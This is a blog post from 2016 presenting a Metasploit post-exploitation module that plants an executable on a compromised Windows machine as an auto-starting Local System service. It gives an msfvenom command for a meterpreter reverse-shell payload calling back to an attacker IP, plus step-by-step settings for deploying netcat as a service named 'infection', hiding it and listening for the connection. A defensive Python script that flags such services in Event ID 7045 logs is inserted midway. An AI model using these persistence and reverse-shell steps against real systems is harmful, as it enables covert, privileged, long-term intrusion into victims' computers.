Sunday 13 November 2016

deploy_service_payload - Post MSF Module to Deploy a Persistence Service Payload

[What Does This Module Do?]
deploy_service_payload.rb uploads your payload.exe to the target system (DEPLOY_PATH) and creates a service pointing to it (SERVICE_NAME).

The service will auto-start with Windows under Local System privileges. Rebooting the system or restarting the service will run the malicious executable with elevated privileges. WARNING: this module only supports uploading .exe executables.
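The persistence described above leaves a clear artifact: a newly installed service whose binary lives at an arbitrary DEPLOY_PATH and that auto-starts as Local System. As an added defender-side example (not part of this module or this post), the script below parses constructed Windows System log Event ID 7045 ("A service was installed in the system") records and flags services whose image path sits outside the usual system directories. The flattened record layout, the sample log lines and the trusted-directory baseline are assumptions.

```python
# Constructed sample of Windows System log Event ID 7045 ("A service was installed
# in the system") records, one per line. Names, paths and accounts are made-up
# test data, not output captured from the module above.
SAMPLE_7045 = r"""
7045|Service Name: Windows Update Medic Service|Service File Name: C:\Windows\System32\svchost.exe -k WaaSMedicSvc|Service Start Type: demand start|Service Account: LocalSystem
7045|Service Name: infection|Service File Name: C:\Users\Public\nc.exe|Service Start Type: auto start|Service Account: LocalSystem
7045|Service Name: backup agent|Service File Name: "C:\Program Files\BackupCo\agent.exe" /svc|Service Start Type: auto start|Service Account: LocalSystem
7045|Service Name: helper|Service File Name: C:\ProgramData\helper.exe|Service Start Type: auto start|Service Account: NT AUTHORITY\LocalService
"""
# Assumed baseline of where legitimate service binaries live; adjust per estate.
TRUSTED_PREFIXES = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
REASON_PATH = "image path outside C:\\Windows or C:\\Program Files"
REASON_AUTOSTART_SYSTEM = "auto start as LocalSystem"

def parse_7045(line):
    """Split one flattened 7045 record into a dict of its 'Key: value' fields."""
    fields = line.split("|")
    if fields[0] != "7045":
        return None
    return {k: v.strip() for k, _, v in (f.partition(": ") for f in fields[1:])}

def image_executable(service_file_name):
    """Return the executable part of an ImagePath, dropping its arguments."""
    s = service_file_name.strip()
    if s.startswith('"'):
        return s[1:].split('"', 1)[0]
    return s.split(" ", 1)[0]

def find_suspicious_services(log_text):
    """Map service name -> reasons for each new service whose binary is outside
    TRUSTED_PREFIXES (the DEPLOY_PATH pattern), noting auto-start LocalSystem."""
    hits = {}
    for line in log_text.splitlines():
        rec = parse_7045(line)
        if not rec:
            continue
        exe = image_executable(rec.get("Service File Name", "")).lower()
        reasons = []
        if not exe.startswith(TRUSTED_PREFIXES):
            reasons.append(REASON_PATH)
        if (rec.get("Service Start Type", "").lower() == "auto start"
                and rec.get("Service Account", "").lower() == "localsystem"):
            reasons.append(REASON_AUTOSTART_SYSTEM)
        if REASON_PATH in reasons:
            hits[rec["Service Name"]] = reasons
    return hits
```

On the sample data this flags "infection" (untrusted path, auto start as LocalSystem) and "helper" (untrusted path only), while the svchost and Program Files entries pass.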

[NOTE]

BUILD SERVICE PAYLOAD:
$ sudo msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker IP> LPORT=<Attacker Port> -a x86 --platform windows -f exe-service -o Program.exe

--WARNING: This module will not delete the payload deployed.
--WARNING: Only executables explicitly written to interface with the Service Control Manager should be installed this way. While SC will happily accept a regular non-service binary, you will receive the fatal Error 1053 when you attempt to start the service. Please read the following article:
--Article: How to Run Any Program as a Background Service in Windows

[INFO]



[INSTALLATION]

1* Download Module from {HERE}
2* Copy the ruby file into /{path}/metasploit-framework/modules/post/windows/manage/
3* Open msfconsole and issue the command "reload_all" to reload the module paths.
4* use post/windows/manage/deploy_service_payload

[ADVANCED OPTIONS]



[USAGE]

NOTE: In the following example we are going to deploy a NETCAT executable stored on the attacker machine (using netcat [ nc.exe ] is not mandatory; by default the module deploys a built-in service executable).

To deploy a NETCAT client we need to set the module options 'USE_NETCAT' | 'NC_LHOST' | 'NC_LPORT' and manually start a NETCAT listener to receive the remote service connection.


-- DEPLOYING PAYLOAD :

1* set USE_NETCAT true
2* set NC_LPORT 31337
3* set NC_LHOST 192.168.0.100
4* set DEPLOY_PATH {deployment path in victim box}
5* set LOCAL_PATH /home/{user}/Desktop/nc.exe {executable to be uploaded}
6* set PAYLOAD_NAME nc.exe
7* set SERVICE_NAME infection
8* set SESSION 1

{Opening a netcat listener on the desired port to receive the remote service connection}

$ sudo nc -lvp 31337

Expected Results :  


-- HIDING PAYLOAD :

1* set HIDDEN_ATTRIB true
2* set DEPLOY_PATH {deployment path in victim box}
3* set PAYLOAD_NAME nc.exe
4* set SESSION 1

Expected Results :


-- CHECKING SERVICE STATUS :

1* set SERVICE_STATUS true
2* set SERVICE_NAME infection
3* set SESSION 1

Expected Results :


-- DELETING REMOTE SERVICE :

1* set DEL_SERVICE true
2* set SERVICE_NAME infection
3* set SESSION 1
--WARNING: This module will not delete the payload deployed.
Expected Results :


[VIDEO DEMO]




[Credits]

Module Author: pedr0 Ubuntu [r00t-3xp10it]
Special Thanks: Fatima Ferreira | Chaitanya